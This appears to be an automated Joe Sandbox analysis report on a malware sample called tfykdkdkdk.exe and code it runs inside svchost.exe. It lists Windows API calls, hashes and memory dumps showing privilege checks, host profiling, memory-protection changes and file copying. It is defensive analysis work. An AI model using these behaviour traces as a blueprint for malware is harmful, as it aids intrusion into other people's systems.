Associated: 00000012.00000002.1953213975.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_tfykdkdkdk.jbxd

Yara matches

Similarity

API ID: DirectoryProcess$CommandCreateCurrentExitLineSleepSystemlstrcat
String ID: /u
API String ID: 4042104365-4118749740
Opcode ID: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction ID: 96ee623e9da2e0af38eded0e061056f2ac1dfe5269435d034bd7705fbe78fb85
Opcode Fuzzy Hash: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction Fuzzy Hash: 36115472802619ABDB20AFB1DD0DEDE7B7CAF08705F10003AF605F20A5D63897458BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401CB5 Relevance: 3.0, APIs: 2, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000000,0040157D,00000000,00000000,00000000,?,530C1AEE,004020E8), ref: 00401CC2
RtlFreeHeap.NTDLL(00000000,?,530C1AEE,004020E8), ref: 00401CC9

Memory Dump Source

Source File: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.1953148419.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953180147.0000000000402000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953197189.0000000000403000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953213975.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_tfykdkdkdk.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction ID: de2e74cc2c5d9c26438789ecc4f5efd00e9e3bcaa0604652a6375203050d3e1d
Opcode Fuzzy Hash: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction Fuzzy Hash: E3C04C31449240FBEF015F909B0CB0A7ABDAB84743F008468F149A11A486748944DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00401C79 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,?,00401D53,00001000,00000000,00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C7F
RtlAllocateHeap.NTDLL(00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C86

Memory Dump Source

Source File: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.1953148419.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953180147.0000000000402000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953197189.0000000000403000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953213975.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_tfykdkdkdk.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction ID: bbb82e670732032ebf8e303bc8a39f8b906a07d9cff939e05880545c35f94fa9
Opcode Fuzzy Hash: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction Fuzzy Hash: 9EB00275546240EBDE416FE59F0DA097E7DBB84743F008454B349E5064CA758514DB25

Uniqueness

Uniqueness Score: -1.00%

Function 005203A1 Relevance: 1.6, APIs: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 005203DA

Memory Dump Source

Source File: 00000012.00000002.1953503178.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_520000_tfykdkdkdk.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction ID: 8cecb3417d9a7654975590c03147148a63d015f051bcf23d6542dca7e153d386
Opcode Fuzzy Hash: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction Fuzzy Hash: 5101D873A021246BEB24CA19EC40B6B7B59FFE6730F29D925F905E72C2C574DC0245A0

Uniqueness

Uniqueness Score: -1.00%

Function 00401593 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00401442,00401295), ref: 004015AA

Memory Dump Source

Source File: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.1953148419.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953180147.0000000000402000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953197189.0000000000403000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953213975.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_tfykdkdkdk.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction ID: 98ea57f8acb340bf8185d7c41957bfe50ebb8c53553d8a1b8998a7004bdb3259
Opcode Fuzzy Hash: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction Fuzzy Hash: 47D05E33C0830C5ACB04EBF19A0E8CD77FC9B0C214F1004A6E505B2080FA76EA5883A8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401264 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00000000, /p=,00401033,00000000), ref: 0040126D
StrToIntA.SHLWAPI(-00000004), ref: 0040127B
GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe,00000104), ref: 004012A1

Strings

/p=, xrefs: 00401264
C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe, xrefs: 0040129A

Memory Dump Source

Source File: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.1953148419.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953180147.0000000000402000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953197189.0000000000403000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953213975.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_tfykdkdkdk.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: /p=$C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe
API String ID: 514040917-3396663042
Opcode ID: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction ID: a97e36b21e4f6c4b508bbe1c7bc1ce47f756939332ff9af57f8a63180c09d7ad
Opcode Fuzzy Hash: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction Fuzzy Hash: EAE048B068130177EA502F719E0FB156A985B08B4FF544476BA45F41F5DAFCC241451D

Uniqueness

Uniqueness Score: -1.00%

Function 004234A8 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 396COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(00432918,0000015C), ref: 0042358F
__aulldiv.LIBCMT ref: 00423916

Strings

uT#, xrefs: 00423517, 00423545, 0042354B, 0042359B, 00423642, 0042365C, 00423722, 00423842, 00423866, 0042388F, 004238C3, 004238CA, 00423935, 00423961, 00423A0E

Memory Dump Source

Source File: 00000012.00000002.1953324734.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_421000_tfykdkdkdk.jbxd

Similarity

API ID: DirectoryWindows__aulldiv
String ID: uT#
API String ID: 2557273154-3519781515
Opcode ID: d23a282598ad219914c9b2bdc5d99ce2b0672d1c0f91bb2d386cbf8a1c0af863
Instruction ID: ec485fc663059ce4ae46598323261169b09f174663d50ce322c37d4fa9724364
Opcode Fuzzy Hash: d23a282598ad219914c9b2bdc5d99ce2b0672d1c0f91bb2d386cbf8a1c0af863
Instruction Fuzzy Hash: 76E1D2727003229BC718DF38EDA06E537A2EB98719F59813BD800C73E5E678AD45879D

Uniqueness

Uniqueness Score: -1.00%

Function 00401305 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,?,0040128B), ref: 0040130B
RtlAllocateHeap.NTDLL ref: 00401387

Strings

NTDLL.DLL, xrefs: 00401306

Memory Dump Source

Source File: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.1953148419.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953180147.0000000000402000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953197189.0000000000403000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1953213975.0000000000404000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_tfykdkdkdk.jbxd

Yara matches

Similarity

API ID: AllocateHandleHeapModule
String ID: NTDLL.DLL
API String ID: 3205619-1613819793
Opcode ID: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction ID: 661fe251d33bcd873fe0306d0fa480983da9c30ce6244cc3b298440f3ea03910
Opcode Fuzzy Hash: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction Fuzzy Hash: 5E213EA5B9079479E13025761E8EF2759AD85E6F99360817FBB04B21D6D8FC4C04C06C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exePID: 3320, Parent PID: 6408COMMON

Execution Graph

Execution Coverage:	23.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	630
Total number of Limit Nodes:	9

Executed Functions

Function 02AC2BA4 Relevance: 3.1, APIs: 2, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02AC2BDA
NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02AC2C23

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 669b9b0fcee68fdcf1c8a47c00b37e4b3176e18d939243e89c962cd7a1805be2
Instruction ID: da79eafa4e5cea9ff13197cb3f46c52910f094e58c8d737566b3992dd8c56d41
Opcode Fuzzy Hash: 669b9b0fcee68fdcf1c8a47c00b37e4b3176e18d939243e89c962cd7a1805be2
Instruction Fuzzy Hash: DF11CD35910105AFCB09CF58C994EE977B4FF8C324F2542ADE9254B291DF31EA46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02AC338D Relevance: 19.7, APIs: 13, Instructions: 156
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,0000011C), ref: 02AC33BE
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 02AC33E0
GetLastError.KERNEL32 ref: 02AC33E2
GetProcessHeap.KERNEL32(00000008,?), ref: 02AC3401
RtlAllocateHeap.NTDLL(00000000), ref: 02AC3408
GetTokenInformation.KERNELBASE(?,00000002,00000000,?,?), ref: 02AC3428
GetSidIdentifierAuthority.ADVAPI32(?), ref: 02AC3448
GetSidSubAuthorityCount.ADVAPI32(?), ref: 02AC346B
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 02AC3480
GetSidSubAuthority.ADVAPI32(?,?), ref: 02AC3497
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02AC351A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC3527
HeapFree.KERNEL32(00000000), ref: 02AC352E

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: AuthorityHeap$ProcessToken$Information$AllocateChangeCloseCountErrorFindFreeIdentifierLastNotificationOpen
String ID:
API String ID: 3355550324-0
Opcode ID: 3c31a0b1ed8785c7ec7af7f6432b0ee180badb756346099780069f6d053508a6
Instruction ID: 1eb06cf1cd443aa816599b62fac8a47bf7f97e8f4603135f37274126aa6985ee
Opcode Fuzzy Hash: 3c31a0b1ed8785c7ec7af7f6432b0ee180badb756346099780069f6d053508a6
Instruction Fuzzy Hash: 1D51D0316443019FDB128F29D989B6ABBA8FF4A315F28898CF485C7251CF31D549CF62

Uniqueness

Uniqueness Score: -1.00%

Function 02AC3555 Relevance: 15.1, APIs: 10, Instructions: 76
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02AC3570
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02AC3585
GetLastError.KERNEL32 ref: 02AC358B
GetProcessHeap.KERNEL32(00000008,00000001), ref: 02AC35A1
RtlAllocateHeap.NTDLL(00000000), ref: 02AC35A8
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02AC35C1
GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 02AC35CF
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02AC35F0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC35FD
HeapFree.KERNEL32(00000000), ref: 02AC3604

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessToken$Information$AllocateAuthorityChangeCloseErrorFindFreeLastNotificationOpen
String ID:
API String ID: 1063018014-0
Opcode ID: c8f9a9ef146b9985057f13daca46f68d3470e3c18157832f0e258ab955b8d444
Instruction ID: fda07b51d7eacf204a004ef9443e189858576dcdfd64453cb192ada613b2b60e
Opcode Fuzzy Hash: c8f9a9ef146b9985057f13daca46f68d3470e3c18157832f0e258ab955b8d444
Instruction Fuzzy Hash: E0215B31940208BFEF218B95DC49BAEBA3CFF41766F248599F511E6090CF35CA55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02AC2DAF Relevance: 12.1, APIs: 8, Instructions: 72
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,02AC51B9,?,02AC70E8,00000000,00000000,?), ref: 02AC2DC8
GetFileSize.KERNEL32(00000000,00000000,?,?,02AC51B9,?,02AC70E8,00000000,00000000,?,00000000), ref: 02AC2DDC
CloseHandle.KERNEL32(00000000,?,02AC51B9,?,02AC70E8,00000000,00000000,?,00000000), ref: 02AC2E4D

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: faec3ad289406b74dbd15d7e5ae8c5d2d9d0b206a62c4e3c0b818cbda888aa56
Instruction ID: b1561f80e3280ba9ab8ad1ed3e6a8c444f7fa296c0c9d8241012aa633365bc3a
Opcode Fuzzy Hash: faec3ad289406b74dbd15d7e5ae8c5d2d9d0b206a62c4e3c0b818cbda888aa56
Instruction Fuzzy Hash: F6117FB1940221AFD7225F60DC88B6BBE6CFB4A761F204919FE42E6250CF30C812CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02AC4068 Relevance: 12.1, APIs: 8, Instructions: 63
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000009,?,02AC373D,?,00100000,00000006,?), ref: 02AC406D
RtlAllocateHeap.NTDLL(00000000,?,02AC373D), ref: 02AC4074
CreateFileMappingW.KERNELBASE(000000FF,02AC62B8,00000004,00000000,?,?,?,?,?,02AC373D,?,00100000,00000006,?), ref: 02AC409B
GetLastError.KERNEL32(?,?,?,02AC373D,?,00100000,00000006,?), ref: 02AC40A7
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,?,?,?,?,02AC373D,?,00100000,00000006,?), ref: 02AC40C6
CloseHandle.KERNEL32(00000000,?,?,?,02AC373D,?,00100000,00000006,?), ref: 02AC40D5
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,02AC373D,?,00100000,00000006,?), ref: 02AC40DE
HeapFree.KERNEL32(00000000,?,?,?,02AC373D,?,00100000,00000006,?), ref: 02AC40E5

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$AllocateCloseCreateErrorFreeHandleLastMappingView
String ID:
API String ID: 3951456143-0
Opcode ID: baebfe7e887fdfd02cac4d42ff2344b2ab487a5448b7564cb3f8f7fd7da5acfd
Instruction ID: 0e02d4b446075fc296616037e27d9d652997935ad63f52be4aa6efb12ef2759d
Opcode Fuzzy Hash: baebfe7e887fdfd02cac4d42ff2344b2ab487a5448b7564cb3f8f7fd7da5acfd
Instruction Fuzzy Hash: 90116075684302AFD7208F64AC48F16BBE8EF08721F21881CF695DA291DF30D8158F10

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1FE9 Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02AC1FF0
CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02AC2009
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02AC2014
CloseHandle.KERNEL32 ref: 02AC2025

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: CloseCreate$ChangeEventFindHandleNotificationThread
String ID:
API String ID: 3181087867-0
Opcode ID: 5b255f511a3959282ee475b54dafae85133bac9a79d00f843e80bcf5b1b721f3
Instruction ID: ac2cc25f216361c11ae0a6321114afc579f5bd3711f3a0f2d013a154763d50f1
Opcode Fuzzy Hash: 5b255f511a3959282ee475b54dafae85133bac9a79d00f843e80bcf5b1b721f3
Instruction Fuzzy Hash: 57E09A319961317A96316B76BC0CED77E9DFF4A7B53214925B809D0218DF20C856CAF4

Uniqueness

Uniqueness Score: -1.00%

Function 02AC26ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02AC2709
RtlGetVersion.NTDLL(?), ref: 02AC271E

Part of subcall function 02AC3641: GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02AC2790), ref: 02AC3659

Strings

f<v, xrefs: 02AC27BD

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersionmemset
String ID: f<v
API String ID: 487673674-2911902482
Opcode ID: 3a3ad4d60e40297cd03f113f14c6f325ac358165f98366f4649b5439819495f4
Instruction ID: a5035f552ddc5926802bc5ce325e5e18557458ad02dcc62f1336c69d952a9ca2
Opcode Fuzzy Hash: 3a3ad4d60e40297cd03f113f14c6f325ac358165f98366f4649b5439819495f4
Instruction Fuzzy Hash: E021F535CC83A89ADB11DBB4A9416D7FFBC9F96B00F2408D9D9445730ADE208526CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02AC492A Relevance: 5.1, APIs: 4, Instructions: 62
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,02AC70E8), ref: 02AC4982
HeapFree.KERNEL32(00000000,?,00000000,00000000,02AC70E8), ref: 02AC4989
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,02AC70E8), ref: 02AC49B1
HeapFree.KERNEL32(00000000,?,00000000,00000000,02AC70E8), ref: 02AC49B8

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: ec121e8416e0d92af33eae4700d3c38fc92e681802fec427ce3527b3fe1d88eb
Instruction ID: 47b87acaef496d6d0af2eb3b290b6ca013aab9d704ea4521acf4211828164038
Opcode Fuzzy Hash: ec121e8416e0d92af33eae4700d3c38fc92e681802fec427ce3527b3fe1d88eb
Instruction Fuzzy Hash: 2F11C176944218ABDB14DBA4D858BEEF7BCFB48315F244559ED44D6140EF30DA14CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02AC2C33 Relevance: 4.6, APIs: 3, Instructions: 74
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE(02AC63B4,?), ref: 02AC2C67

Part of subcall function 02AC55BC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 02AC55D3
Part of subcall function 02AC55BC: CreateDirectoryW.KERNELBASE(?,02AC62B8), ref: 02AC561C

Part of subcall function 02AC2D40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC2D86
Part of subcall function 02AC2D40: RtlFreeHeap.NTDLL(00000000), ref: 02AC2D8D

lstrcpyW.KERNEL32(02AC63B4,?), ref: 02AC2CC7
lstrcatW.KERNEL32(?,02AC738C), ref: 02AC2CD9

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CreateDirectoryFolderFreePathProcesslstrcatlstrcpy
String ID:
API String ID: 2199617466-0
Opcode ID: bceb662eace6e953480bdbb08d9fa72d6b73cc46ace2064797f116ac799b18f3
Instruction ID: be320a065be63f774e64d6e3ca9e3b358f20cd4e9f694e7d50498d4017fb5103
Opcode Fuzzy Hash: bceb662eace6e953480bdbb08d9fa72d6b73cc46ace2064797f116ac799b18f3
Instruction Fuzzy Hash: 6921E8B298020C9FDB21DBA4DD49BDA77BCAF08304F60046AF959E2155EF34D6588F61

Uniqueness

Uniqueness Score: -1.00%

Function 02AC2833 Relevance: 4.6, APIs: 3, Instructions: 73
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExW.KERNELBASE(00000000,?,?,?,00000005), ref: 02AC2858
LookupAccountNameW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02AC287E
GetSystemTimeAsFileTime.KERNEL32(?,?,00000005), ref: 02AC28A3

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: NameTime$AccountComputerFileLookupSystem
String ID:
API String ID: 3076100934-0
Opcode ID: 17678e5b8bb8ee5ea1cd8a0fee1c07bed57d6d676598d1b281417ce22b6236eb
Instruction ID: 372f84d63fb8e668a036525c01f5bb05844b21a874cfcafc0442d39188f62473
Opcode Fuzzy Hash: 17678e5b8bb8ee5ea1cd8a0fee1c07bed57d6d676598d1b281417ce22b6236eb
Instruction Fuzzy Hash: 36215C72D442489FCB65CF25E8849DBBBACEF45714B20022AFC15E3242DB30D91ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 02AC5108 Relevance: 4.6, APIs: 3, Instructions: 52
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02AC54AC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 02AC54C0
Part of subcall function 02AC54AC: CreateDirectoryW.KERNELBASE(00000000,02AC62B8), ref: 02AC5500

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 02AC513A
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 02AC515E
CloseHandle.KERNEL32(00000000), ref: 02AC5167

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseDirectoryFolderHandlePathRead
String ID:
API String ID: 221032062-0
Opcode ID: f9b80f4501127e99caa8441ac05790f1172fbb798a621469e1d96cb58d37ead4
Instruction ID: a2d6fe56e22ee11ae702b01dd506b77e86a8c964e2a7e849881c2924dc7aee9c
Opcode Fuzzy Hash: f9b80f4501127e99caa8441ac05790f1172fbb798a621469e1d96cb58d37ead4
Instruction Fuzzy Hash: DF01DB72D44308BFD6306A60EC8CF6BB7ECE785774F614A2DFA51E2180DB31A5098661

Uniqueness

Uniqueness Score: -1.00%

Function 02AC2EBA Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02AC2D76,?,?,?,?), ref: 02AC2ED5
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,?,?,02AC2D76,?,?,?,?,?), ref: 02AC2EF4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,02AC2D76,?,?,?,?,?), ref: 02AC2EFD

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: f1dd12727f049ad46aef9c094ce26cbca4cf67dd10f644fd918793281dcfc8a5
Instruction ID: 40a458ba53075278e4ede455e300ea07001a67bc249545bf6c999a90f4500e0f
Opcode Fuzzy Hash: f1dd12727f049ad46aef9c094ce26cbca4cf67dd10f644fd918793281dcfc8a5
Instruction Fuzzy Hash: CCF06232945118BBDB205A66AC48FABBA6CEB456B5F20462AFD15D3180DB709D1186F0

Uniqueness

Uniqueness Score: -1.00%

Function 02AC2D40 Relevance: 4.5, APIs: 3, Instructions: 43
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02AC2DAF: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,02AC51B9,?,02AC70E8,00000000,00000000,?), ref: 02AC2DC8

CopyFileW.KERNEL32(?,?,00000000), ref: 02AC2DA5

Part of subcall function 02AC2EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02AC2D76,?,?,?,?), ref: 02AC2ED5

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC2D86
